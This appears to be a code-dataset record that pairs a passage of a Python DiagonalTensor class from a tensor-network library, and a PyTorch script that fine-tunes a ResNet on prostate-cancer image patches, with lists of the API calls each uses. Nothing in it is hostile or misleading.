# raise ValueError(funcs.errorMessage(location = funcName, err = "data shape is not correct: {} expected but {} obtained.".format(tuple([l] * dim), data.shape)))
# # shape is None, how to deduce shape?
# elif (labels is not None):
# dim = len(labels)
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "cannot deduce data shape since data and shape are both None."))
# elif (len(data.shape) == 1):
# l = len(data)
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# if (len(data.shape) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "dimension of data is not compatible with dimension deduced from labels: expect {} but {} is given.".format(dim, len(data.shape))))
# l = data.shape[0]
# else:
# # deduce from data.shape
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data, labes and shape are all None."))
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# dim = len(data.shape)
# l = data.shape[0]
# print('l = {}, dim = {}'.format(l, dim))
# shape = tuple([l] * dim)
data = self.generateData(shape = shape, data = data, isTensorLike = isTensorLike)
# if (tensorLikeFlag):
# data = None
# elif (data is None):
# # default is identity
# data = xplib.xp.ones(l)
# elif (len(data.shape) == 1):
# data = xplib.xp.copy(data)
# else:
# data = xplib.xp.array([data[tuple([x] * dim)] for x in range(l)])
# must be a copy of original "data" if exist
# if (labels is None):
# labels = self.generateLabels(dim)
if (legs is None):
legs = []
for label, dim in zip(labels, list(shape)):
legs.append(Leg(self, dim, label))
else:
for leg in legs:
leg.tensor = self
return legs, data, labels, shape
def __init__(self, shape = None, labels = None, data = None, degreeOfFreedom = None, name = None, legs = None, tensorLikeFlag = False, dtype = xplib.xp.float64):
super().__init__(diagonalFlag = True, tensorLikeFlag = tensorLikeFlag, dtype = dtype)
legs, data, labels, shape = self.deduction(legs = legs, data = data, labels = labels, shape = shape, isTensorLike = tensorLikeFlag)
self.a = data
self.legs = legs
# self.totalSize = funcs.tupleProduct(shape)
# functions of Tensor from here
self.degreeOfFreedom = degreeOfFreedom
self.name = name
# self._dim = len(shape)
if shape == ():
self._length = 1
else:
self._length = shape[0]
@property
def dim(self):
return len(self.legs)
@property
def shape(self):
return tuple([self._length] * self.dim)
@property
def labels(self):
return [leg.name for leg in self.legs]
@property
def chi(self):
return self._length
def __str__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __repr__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __matmul__(self, b):
return contractTwoTensors(ta = self, tb = b)
def bondDimension(self):
"""
The bond dimension of the current diagonal tensor: it is the same over all dimensions.
Returns
-------
int
The dimension for each index.
"""
return self._length
def moveLegsToFront(self, legs):
"""
Change the orders of legs: move a given set of legs to the front while not modifying the relative order of other legs. Use xplib.xp.moveaxis to modify the data if this is not a TensorLike object.
In fact make nothing difference for diagonal tensor: for Tensor this function will change the order of indices of data, but for diagonal tensor it is only a virtual change of legs.
Parameters
----------
legs : list of Leg
The set of legs to be put at front.
"""
moveFrom = []
moveTo = []
currIdx = 0
movedLegs = legs
for currLeg in legs:
for i, leg in enumerate(self.legs):
if (leg == currLeg):
moveFrom.append(i)
moveTo.append(currIdx)
currIdx += 1
break
for leg in movedLegs:
self.legs.remove(leg)
# print(moveFrom, moveTo)
# print(labelList)
# print(self.labels)
self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def toVector(self):
"""
Deprecated
Make a vector according to the diagonal elements.
Deprecated since this behavior is different from Tensor, which will return a flattened data of ndarray. However, if we return the ndarray, this is usually useless for diagonal tensor and may generate an issue of CPU time.
To obtain the data, DiagonalTensor.a is enough.
Returns
-------
1D ndarray of float
A vector contains diagonal elements of the diagonal tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to vector since no data contained.', 'DiagonalTensor.toVector')
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toVector", deprecateMessage = "This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.")
return xplib.xp.copy(xplib.xp.ravel(self.a))
def toMatrix(self, rows, cols):
"""
Deprecated
Make a matrix of the data of this diagonal tensor, given the labels or legs of rows and cols.
Deprecated since this function is time comsuming(O(n^d)), and for most of the cases there are much better ways to use the data rather than making a matrix. For details, see CTL.tensor.contract for more information.
Parameters
----------
rows : None or list of str or list of Leg
The legs for the rows of the matrix. If None, deducted from cols.
cols : None or list of str or list of Leg
The legs for the cols of the matrix. If None, deducted from rows.
Returns
-------
2D ndarray of float
The data of this tensor, in the form of (rows, cols).
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to matrix since no data contained.', 'DiagonalTensor.toMatrix')
# print(rows, cols)
# print(self.labels)
# input two set of legs
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toMatrix", deprecateMessage = "Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.")
assert not ((rows is None) and (cols is None)), "Error in Tensor.toMatrix: toMatrix must have at least row or col exist."
if (rows is not None) and (isinstance(rows[0], str)):
rows = [self.getLeg(label) for label in rows]
if (cols is not None) and (isinstance(cols[0], str)):
cols = [self.getLeg(label) for label in cols]
if (cols is None):
cols = funcs.listDifference(self.legs, rows)
if (rows is None):
rows = funcs.listDifference(self.legs, cols)
assert (funcs.compareLists(rows + cols, self.legs)), "Error Tensor.toMatrix: rows + cols must contain(and only contain) all legs of tensor."
colIndices = self.getLegIndices(cols)
rowIndices = self.getLegIndices(rows)
colShape = tuple([self.shape[x] for x in colIndices])
rowShape = tuple([self.shape[x] for x in rowIndices])
colTotalSize = funcs.tupleProduct(colShape)
rowTotalSize = funcs.tupleProduct(rowShape)
data = funcs.diagonalNDTensor(self.a, self.dim)
data = xplib.xp.reshape(data, (rowTotalSize, colTotalSize))
return data
def copy(self):
"""
Make a copy of current diagonal tensor, without copy the legs. For more information, refere to Tensor.copy
Returns
-------
DiagonalTensor
A copy of the current diagonal tensor, all the information can be copied is contained.
"""
return DiagonalTensor(data = self.a, shape = self.shape, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, tensorLikeFlag = self.tensorLikeFlag)
# no copy of tensor legs, which may contain connection information
def toTensorLike(self):
"""
Make a copy of current tensor, without copying the legs. This function works almost like self.copy(), but without copying the data.
Returns
-------
DiagonalTensor
A DiagonalTensorLike of the current tensor, all the information can be copied is contained except legs and data.
"""
if (self.tensorLikeFlag):
return self.copy()
else:
return DiagonalTensor(data = None, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, shape = self.shape, tensorLikeFlag = True)
def moveLabelsToFront(self, labelList):
"""
Change the orders of legs: move a given set of labels to the front. For details, check "self.moveLegsToFront".
Parameters
----------
labelList : list of str
The set of labels to be put at front.
"""
legs = self.getLegsByLabel(labelList)
self.moveLegsToFront(legs)
# legs = [self.getLeg(label) for label in labelList]
# self.moveLegsToFront(legs)
# moveFrom = []
# moveTo = []
# currIdx = 0
# movedLegs = []
# for label in labelList:
# for i, leg in enumerate(self.legs):
# if (leg.name == label):
# moveFrom.append(i)
# moveTo.append(currIdx)
# currIdx += 1
# movedLegs.append(leg)
# break
# for leg in movedLegs:
# self.legs.remove(leg)
# self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def outProduct(self, labelList, newLabel):
"""
Deprecated
Comment
-------
The outer product will destroy the shape of diagonal tensor: we cannot easily combine several legs if it is a full diagonal tensor, so a TypeError will be raised.
"""
raise TypeError(funcs.errorMessage(location = "DiagonalTensor.outProduct", err = "DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."))
def norm(self):
"""
Norm of the current tensor. O(n).
Returns
-------
float
The norm of data.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have norm since no data contained.', 'DiagonalTensor.norm')
return xplib.xp.linalg.norm(self.a)
def trace(self, rows = None, cols = None):
"""
Trace of the current diagonal tensor. To not destroy the property for the diagonal tensors, this function can only be used to calculate the global trace on the main diagonal.
Parameters
----------
rows, cols: None
Only set to be compatible with the usage for Tensor
Returns
-------
float
The trace of the matrix generated by given cols and rows.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have trace since no data contained.', 'DiagonalTensor.trace')
return xplib.xp.sum(self.a)
def single(self):
"""
Generate a single value from a tensor.
Note the difference between this and Tensor.single(): in Tensor object, the data are saved as ndarray, so for single value it must be a 0-d array, in other words, a single number.
However, for DiagonalTensor: in all cases the data are saved as 1D-array, so we need to first decide whether it can be transferred to a single number, and then return the lowest index.
Returns
-------
float
A single value of this tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to single value since no data contained.', 'DiagonalTensor.single')
assert self._length == 1, "Error: cannot get single value from diagTensor whose length is not (1,)."
assert self.shape == (), "Error: cannot get single value from tensor whose shape is not ()."
return self.a[()]
def toTensor(self, labels = None):
"""
Return a ndarray of this tensor. Since the current tensor object only saves the main diagonal, the tensor itself may be much larger, so this is not recommended and not used in any of the internal functions.
Parameters
----------
labels : None or list of str
The order of labels for the output tensor. Note that if labels is None, the order of legs is not fixed, may differ from time to time.
Returns
-------
ndarray of float
The data of the tensor, order of legs are given by the labels.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to tensor since no data contained.', 'DiagonalTensor.toTensor')
if (labels is not None):
self.reArrange(labels)
return funcs.diagonalNDTensor(self.a, self.dim)
def sumOutLeg(self, leg, weights = None):
"""
Sum out one leg to make a (D - 1)-dimensional tensor. Give a warning(and do nothing) if leg is not one of the current tensor, and give a warning if leg is connected to some bond(not free).
Parameters
----------
leg : Leg
The leg to be summed out.
weights : 1-d array, optional
If not None, then each index on given dimension will be weighted by weights[i].
"""
if not (leg in self.legs):
warnings.warn(funcs.warningMessage("leg {} is not in tensor {}, do nothing.".format(leg, self), location = 'Tensor.sumOutLeg'), RuntimeWarning)
return
if leg.bond is not None:
warnings.warn(funcs.warningMessage("leg {} to be summed out is connected to bond {}.".format(leg, leg.bond), location = 'Tensor.sumOutLeg'), RuntimeWarning)
idx = self.legs.index(leg)
# self.a = xplib.xp.sum(self.a, axis = idx)
self.legs = self.legs[:idx] + self.legs[(idx + 1):]
# if weights is None:
if (len(self.legs) == 0):
# not a diagonal tensor, since the last sum will give a single value
if weights is None:
self.a = xplib.xp.array(xplib.xp.sum(self.a))
else:
self.a = xplib.xp.array(xplib.xp.sum(self.a * weights))
self._length = 1
else:
if (weights is not None):
self.a = self.a * weights
def typeName(self):
"""
The type of the current class.
Returns
-------
{"DiagonalTensor", "DiagonalTensorLike"}
"""
if (self.tensorLikeFlag):
return "DiagonalTensorLike"
else:
return "DiagonalTensor"
from CTL.tensor.contract.contract import contractTwoTensors
|
[
"CTL.funcs.xplib.xp.ravel",
"CTL.funcs.xplib.xp.ones",
"CTL.funcs.funcs.listDifference",
"CTL.funcs.funcs.diagonalNDTensor",
"CTL.funcs.funcs.compareLists",
"CTL.funcs.xplib.xp.linalg.norm",
"CTL.funcs.xplib.xp.copy",
"CTL.funcs.funcs.deprecatedFuncWarning",
"CTL.funcs.funcs.errorMessage",
"CTL.tensor.contract.contract.contractTwoTensors",
"CTL.funcs.funcs.tupleProduct",
"CTL.funcs.xplib.xp.sum",
"CTL.funcs.xplib.xp.diag_indices",
"CTL.tensor.leg.Leg",
"CTL.funcs.xplib.xp.array",
"CTL.funcs.xplib.xp.reshape"
] |
[((20375, 20408), 'CTL.tensor.contract.contract.contractTwoTensors', 'contractTwoTensors', ([], {'ta': 'self', 'tb': 'b'}), '(ta=self, tb=b)\n', (20393, 20408), False, 'from CTL.tensor.contract.contract import contractTwoTensors\n'), ((22452, 22586), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to vector since no data contained."""', '"""DiagonalTensor.toVector"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to vector since no data contained.'\n , 'DiagonalTensor.toVector')\n", (22470, 22586), True, 'import CTL.funcs.funcs as funcs\n'), ((22585, 22780), 'CTL.funcs.funcs.deprecatedFuncWarning', 'funcs.deprecatedFuncWarning', ([], {'funcName': '"""DiagonalTensor.toVector"""', 'deprecateMessage': '"""This will return a vector corresponding to the diagonal of tensor instead of the complete tensor."""'}), "(funcName='DiagonalTensor.toVector',\n deprecateMessage=\n 'This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.'\n )\n", (22612, 22780), True, 'import CTL.funcs.funcs as funcs\n'), ((23700, 23834), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to matrix since no data contained."""', '"""DiagonalTensor.toMatrix"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to matrix since no data contained.'\n , 'DiagonalTensor.toMatrix')\n", (23718, 23834), True, 'import CTL.funcs.funcs as funcs\n'), ((23922, 24133), 'CTL.funcs.funcs.deprecatedFuncWarning', 'funcs.deprecatedFuncWarning', ([], {'funcName': '"""DiagonalTensor.toMatrix"""', 'deprecateMessage': '"""Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix."""'}), "(funcName='DiagonalTensor.toMatrix',\n deprecateMessage=\n 'Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.'\n )\n", (23949, 24133), True, 'import CTL.funcs.funcs as funcs\n'), ((24678, 24720), 'CTL.funcs.funcs.compareLists', 'funcs.compareLists', (['(rows + cols)', 'self.legs'], {}), '(rows + cols, self.legs)\n', (24696, 24720), True, 'import CTL.funcs.funcs as funcs\n'), ((25052, 25080), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['colShape'], {}), '(colShape)\n', (25070, 25080), True, 'import CTL.funcs.funcs as funcs\n'), ((25104, 25132), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['rowShape'], {}), '(rowShape)\n', (25122, 25132), True, 'import CTL.funcs.funcs as funcs\n'), ((25149, 25189), 'CTL.funcs.funcs.diagonalNDTensor', 'funcs.diagonalNDTensor', (['self.a', 'self.dim'], {}), '(self.a, self.dim)\n', (25171, 25189), True, 'import CTL.funcs.funcs as funcs\n'), ((25205, 25257), 'CTL.funcs.xplib.xp.reshape', 'xplib.xp.reshape', (['data', '(rowTotalSize, colTotalSize)'], {}), '(data, (rowTotalSize, colTotalSize))\n', (25221, 25257), True, 'import CTL.funcs.xplib as xplib\n'), ((28234, 28348), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike do not have norm since no data contained."""', '"""DiagonalTensor.norm"""'], {}), "(\n 'DiagonalTensorLike do not have norm since no data contained.',\n 'DiagonalTensor.norm')\n", (28252, 28348), True, 'import CTL.funcs.funcs as funcs\n'), ((28355, 28383), 'CTL.funcs.xplib.xp.linalg.norm', 'xplib.xp.linalg.norm', (['self.a'], {}), '(self.a)\n', (28375, 28383), True, 'import CTL.funcs.xplib as xplib\n'), ((28934, 29050), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike do not have trace since no data contained."""', '"""DiagonalTensor.trace"""'], {}), "(\n 'DiagonalTensorLike do not have trace since no data contained.',\n 'DiagonalTensor.trace')\n", (28952, 29050), True, 'import CTL.funcs.funcs as funcs\n'), ((29057, 29077), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['self.a'], {}), '(self.a)\n', (29069, 29077), True, 'import CTL.funcs.xplib as xplib\n'), ((29690, 29828), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to single value since no data contained."""', '"""DiagonalTensor.single"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to single value since no data contained.'\n , 'DiagonalTensor.single')\n", (29708, 29828), True, 'import CTL.funcs.funcs as funcs\n'), ((30739, 30873), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""DiagonalTensorLike cannot be transferred to tensor since no data contained."""', '"""DiagonalTensor.toTensor"""'], {}), "(\n 'DiagonalTensorLike cannot be transferred to tensor since no data contained.'\n , 'DiagonalTensor.toTensor')\n", (30757, 30873), True, 'import CTL.funcs.funcs as funcs\n'), ((30947, 30987), 'CTL.funcs.funcs.diagonalNDTensor', 'funcs.diagonalNDTensor', (['self.a', 'self.dim'], {}), '(self.a, self.dim)\n', (30969, 30987), True, 'import CTL.funcs.funcs as funcs\n'), ((9880, 9903), 'CTL.funcs.xplib.xp.ones', 'xplib.xp.ones', (['shape[0]'], {}), '(shape[0])\n', (9893, 9903), True, 'import CTL.funcs.xplib as xplib\n'), ((22800, 22822), 'CTL.funcs.xplib.xp.ravel', 'xplib.xp.ravel', (['self.a'], {}), '(self.a)\n', (22814, 22822), True, 'import CTL.funcs.xplib as xplib\n'), ((24540, 24577), 'CTL.funcs.funcs.listDifference', 'funcs.listDifference', (['self.legs', 'rows'], {}), '(self.legs, rows)\n', (24560, 24577), True, 'import CTL.funcs.funcs as funcs\n'), ((24624, 24661), 'CTL.funcs.funcs.listDifference', 'funcs.listDifference', (['self.legs', 'cols'], {}), '(self.legs, cols)\n', (24644, 24661), True, 'import CTL.funcs.funcs as funcs\n'), ((27872, 28032), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', ([], {'location': '"""DiagonalTensor.outProduct"""', 'err': '"""DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."""'}), "(location='DiagonalTensor.outProduct', err=\n 'DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed.'\n )\n", (27890, 28032), True, 'import CTL.funcs.funcs as funcs\n'), ((9411, 9441), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['data.shape'], {}), '(data.shape)\n', (9429, 9441), True, 'import CTL.funcs.funcs as funcs\n'), ((9445, 9470), 'CTL.funcs.funcs.tupleProduct', 'funcs.tupleProduct', (['shape'], {}), '(shape)\n', (9463, 9470), True, 'import CTL.funcs.funcs as funcs\n'), ((10014, 10033), 'CTL.funcs.xplib.xp.copy', 'xplib.xp.copy', (['data'], {}), '(data)\n', (10027, 10033), True, 'import CTL.funcs.xplib as xplib\n'), ((11121, 11140), 'CTL.funcs.xplib.xp.array', 'xplib.xp.array', (['(1.0)'], {}), '(1.0)\n', (11135, 11140), True, 'import CTL.funcs.xplib as xplib\n'), ((5784, 5888), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', ([], {'location': '"""DiagonalTensor.deduceDimension"""', 'err': '"""both data and labels are None."""'}), "(location='DiagonalTensor.deduceDimension', err=\n 'both data and labels are None.')\n", (5802, 5888), True, 'import CTL.funcs.funcs as funcs\n'), ((18001, 18022), 'CTL.tensor.leg.Leg', 'Leg', (['self', 'dim', 'label'], {}), '(self, dim, label)\n', (18004, 18022), False, 'from CTL.tensor.leg import Leg\n'), ((32267, 32287), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['self.a'], {}), '(self.a)\n', (32279, 32287), True, 'import CTL.funcs.xplib as xplib\n'), ((32347, 32377), 'CTL.funcs.xplib.xp.sum', 'xplib.xp.sum', (['(self.a * weights)'], {}), '(self.a * weights)\n', (32359, 32377), True, 'import CTL.funcs.xplib as xplib\n'), ((10234, 10263), 'CTL.funcs.xplib.xp.diag_indices', 'xplib.xp.diag_indices', (['dim', 'l'], {}), '(dim, l)\n', (10255, 10263), True, 'import CTL.funcs.xplib as xplib\n'), ((14221, 14359), 'CTL.funcs.funcs.errorMessage', 'funcs.errorMessage', (['"""Tensor() cannot accept parameters where legs, shape and data being None simultaneously."""'], {'location': 'funcName'}), "(\n 'Tensor() cannot accept parameters where legs, shape and data being None simultaneously.'\n , location=funcName)\n", (14239, 14359), True, 'import CTL.funcs.funcs as funcs\n')]
|
import argparse
from torchvision import transforms
import time, os, sys
from time import strftime
from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix
import copy
from torch.utils.data import DataLoader, Dataset
import pdb
from prostate_utils import *
import glob
parser = argparse.ArgumentParser(description='PyTorch Digital Mammography Training')
parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('--net_type', default='RESNET_34_prostate_trueVal_', type=str, help='model')
parser.add_argument('--net_depth', default=34, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float, help='weight decay')
parser.add_argument('--finetune', '-f', action='store_true', help='Fine tune pretrained model')
parser.add_argument('--batch_size', default=256, type=int)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--num_epochs', default=100, type=int, help='Number of epochs in training')
parser.add_argument('--lr_decay_epoch', default=10, type = int)
parser.add_argument('--max_lr_decay', default = 60, type = int)
parser.add_argument('--APS', default = 175, type = int)
parser.add_argument('--N_subimgs', default = 5, type = int)
parser.add_argument('--N_limit', default = 100000, type = int)
parser.add_argument('--check_after', default=2,
type=int, help='check the network after check_after epoch')
parser.add_argument('--note', type=str, default='none', help="note while running the code")
args = parser.parse_args()
with open(os.path.basename(__file__)) as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + os.path.basename(__file__) + '=' * 20)
for c in codes:
print(c[:-1])
with open('prostate_utils.py') as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + 'prostate_utils.py' + '=' * 20)
for c in codes:
print(c[:-1])
print(args)
rand_seed = 26700
if rand_seed is not None:
np.random.seed(rand_seed)
torch.manual_seed(rand_seed)
torch.cuda.manual_seed(rand_seed)
use_gpu = torch.cuda.is_available()
print('Using GPU: ', use_gpu)
device = torch.device("cuda:0")
mean = [0.6462, 0.5070, 0.8055] # for Prostate cancer
std = [0.1381, 0.1674, 0.1358]
APS = args.APS # default = 448
input_size = 224
data_transforms = {
'train': transforms.Compose([ # 2 steps of data augmentation for training
transforms.RandomCrop(APS), # perform random crop manually in the dataloader
transforms.Scale(input_size),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1),
transforms.ToTensor(),
transforms.Normalize(mean, std)]),
'val': transforms.Compose([
transforms.Scale(input_size),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
}
train_seer_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_seer'
train_beatrice_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_training'
val_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_validation'
img_trains = glob.glob(os.path.join(train_seer_fol, '*png')) + glob.glob(os.path.join(train_beatrice_fol, '*png'))
img_vals = glob.glob(os.path.join(val_fol, '*png'))
print('len of train/val set: ', len(img_trains), len(img_vals))
train_set = data_loader(img_trains, transform = data_transforms['train'])
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
val_set = data_loader(img_vals, transform = data_transforms['val'])
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
def val_fn_epoch(val_fn = None, crit = None, val_loader = None):
nline = 0
running_loss = 0.0
labels_val = torch.zeros(0).type(torch.LongTensor)
preds_val = torch.zeros(0).type(torch.LongTensor).to(device)
with torch.no_grad():
for ix, batch in enumerate(val_loader):
if (len(val_loader.dataset) - nline) < 2: continue
inputs, targets = batch
labels_val = torch.cat((labels_val, targets.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
targets = Variable(targets.type(torch.LongTensor).to(device))
output = val_fn(inputs)
if type(output) == tuple:
output,_ = output
N = output.size(0)
loss = crit(output, targets)
running_loss += loss.item() * N
_, preds = torch.max(output.data, 1) # get the argmax index along the axis 1
preds_val = torch.cat((preds_val, preds))
labels_val = labels_val.to(device)
val_acc = accuracy_score(labels_val, preds_val)
f1 = f1_score(labels_val, preds_val, average='macro')
unique, counts = np.unique(np.array(labels_val), return_counts=True)
return val_acc, f1, preds_val, labels_val, running_loss/labels_val.size(0), dict(zip(unique, counts))
def train_model(model, criterion = None, num_epochs=100, train_loader = train_loader, val_loader = val_loader):
best_f1 = 0
best_epoch = 0
start_training = time.time()
for epoch in range(num_epochs):
start = time.time()
if epoch < 15: lr = args.lr
elif epoch < 30: lr = args.lr/2
elif epoch < 40: lr = args.lr/10
elif epoch < 60: lr = args.lr / 50
else: lr = args.lr/100
if epoch >= 50:
for param in model.parameters():
param.requires_grad = True
optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, momentum=0.9, weight_decay=args.weight_decay)
print('Epoch {}/{}'.format(epoch + 1, num_epochs))
print('lr: {:.6f}'.format(lr))
print('-' * 50)
for phase in ['train']:
if phase == 'train':
data_loader = train_loader
model.train(True)
else:
data_loader = val_loader
model.train(False)
running_loss = 0.0
running_corrects = 0
N_tot = 0
labels_train = torch.zeros(0).type(torch.LongTensor)
preds_train = torch.zeros(0).type(torch.LongTensor).to(device)
for ix, data in enumerate(data_loader):
if (len(data_loader.dataset) - N_tot) < 3: continue
inputs, labels = data
labels_train = torch.cat((labels_train, labels.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
labels = Variable(labels.type(torch.LongTensor).to(device))
optimizer.zero_grad()
outputs = model(inputs)
if type(outputs) == tuple: # for inception_v3 output
outputs,_ = outputs
_, preds = torch.max(outputs.data, 1)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
N_tot += outputs.size(0)
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
preds_train = torch.cat((preds_train, preds))
unique, counts = np.unique(np.array(labels_train), return_counts=True)
print('| Epoch:[{}][{}/{}]\tTrain_Loss: {:.4f}\tAccuracy: {:.4f}\tTrain_data: {}\tTime: {:.2f} mins'.format(epoch + 1, ix + 1,
len(data_loader.dataset)//args.batch_size,
running_loss / N_tot, running_corrects.item() / N_tot, dict(zip(unique, counts)), (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(labels_train.to(device), preds_train, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
sys.stdout.flush()
############ VALIDATION #############################################
if (epoch + 1) % args.check_after == 0:
model.eval()
start = time.time()
val_acc, f1, Pr, Tr, val_loss, labels_val = val_fn_epoch(val_fn = model, crit = criterion, val_loader = val_loader)
print("Epoch: {}\tVal_Loss: {:.4f}\tAccuracy: {:.4f}\tF1-score: {:.4f}\tVal_data: {}\tTime: {:.3f}mins".format(
(epoch + 1), val_loss, val_acc, f1,labels_val, (time.time() - start)/60.0))
try:
conf_matrix = confusion_matrix(Tr, Pr, labels=[0, 1])
print(conf_matrix)
except:
print('could not compute confusion matrix.')
start = time.time()
# deep copy the model
if f1 > best_f1 and epoch > 2:
print('Saving model')
best_f1 = f1
best_epoch = epoch + 1
best_model = copy.deepcopy(model)
state = {
'model': best_model,
'f1-score': best_f1,
'args': args,
'lr': lr,
'saved_epoch': epoch,
}
if not os.path.isdir('checkpoint'):
os.mkdir('checkpoint')
save_point = './checkpoint/'
if not os.path.isdir(save_point):
os.mkdir(save_point)
saved_model_fn = args.net_type + '_' + '_' + strftime('%m%d_%H%M')
torch.save(state, save_point + saved_model_fn + '_' + str(best_f1) + '_' + str(epoch) + '.t7')
print('=======================================================================')
time_elapsed = time.time() - start_training
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best F1-score: {:4f} at epoch: {}'.format(best_f1, best_epoch))
def main():
sys.setrecursionlimit(10000)
if args.net_depth == 34:
model = models.resnet34(pretrained=True)
elif args.net_depth == 50:
model = models.resnet50(pretrained=True)
elif args.net_depth == 101:
model = models.resnet101(pretrained=True)
elif args.net_depth == 152:
model = models.resnet152(pretrained=True)
for param in model.parameters():
param.requires_grad = False
num_in = model.fc.in_features
model.fc = nn.Linear(num_in, 2)
model = model.to(device)
model = torch.nn.DataParallel(model, device_ids=[0,1])
cudnn.benchmark = True
print(model)
print('Start training ... ')
criterion = nn.CrossEntropyLoss().to(device)
train_model(model, criterion, num_epochs=args.num_epochs, train_loader=train_loader, val_loader=val_loader)
if __name__ == "__main__":
main()
|
[
"os.mkdir",
"argparse.ArgumentParser",
"sklearn.metrics.accuracy_score",
"time.strftime",
"sklearn.metrics.f1_score",
"sys.stdout.flush",
"torchvision.transforms.Normalize",
"sys.setrecursionlimit",
"os.path.join",
"torch.utils.data.DataLoader",
"torchvision.transforms.Scale",
"copy.deepcopy",
"torchvision.transforms.RandomHorizontalFlip",
"os.path.basename",
"torchvision.transforms.RandomCrop",
"torchvision.transforms.ColorJitter",
"os.path.isdir",
"torchvision.transforms.RandomVerticalFlip",
"time.time",
"sklearn.metrics.confusion_matrix",
"torchvision.transforms.ToTensor"
] |
